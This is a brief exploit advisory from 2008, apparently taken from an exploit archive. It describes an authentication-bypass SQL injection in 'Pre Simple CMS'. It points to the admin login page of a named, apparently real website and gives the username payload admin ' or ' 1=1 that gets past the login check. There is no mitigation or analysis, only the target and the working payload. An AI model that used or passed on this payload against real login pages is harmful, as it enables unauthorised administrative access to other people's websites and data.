id: 4080
date: 11/05/2008
title: Pre Simple CMS (Auth Bypass) SQL Injection Vulnerability
author: Hussin X
cves: 

========================================================
Pre Simple CMS (Auth Bypass) SQL Injection Vulnerability
========================================================


 Pre Simple CMS (Auth Bypass) SQL Injection Vulnerability
___________________________________

Author: Hussin X
___________________________________

script    : http://www.preproject.com/projectDetail.asp?projectID=240

_____

ExploiT
_______

http://www.uaebis.com/cms/siteadmin/adminlogin.php

exploit > Bypass
______________

user : admin ' or ' 1=1
pass: hussin-X




#  0day.today [2023-03-26]  #